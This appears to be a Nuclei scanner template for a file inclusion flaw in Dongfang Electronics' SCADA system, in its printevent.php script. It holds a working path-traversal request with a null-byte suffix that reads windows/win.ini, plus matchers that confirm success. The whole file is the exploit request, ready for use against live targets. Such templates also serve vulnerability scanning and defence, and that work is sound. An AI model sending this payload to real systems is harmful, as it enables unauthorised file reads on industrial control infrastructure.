id: DFE-SCADA-fileInclude

info:
  name: 东方电子SCADA通用系统printevent.php文件包含
  author: Str1am
  severity: high
  tags: SCADA,fileInclude

requests:
  - method: GET
    path:
      - "{{BaseURL}}/modules/event/server/printevent.php?action=../../../../../../../../../../../../windows/win.ini%00.htm"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "extensions"
        part: body
        condition: and
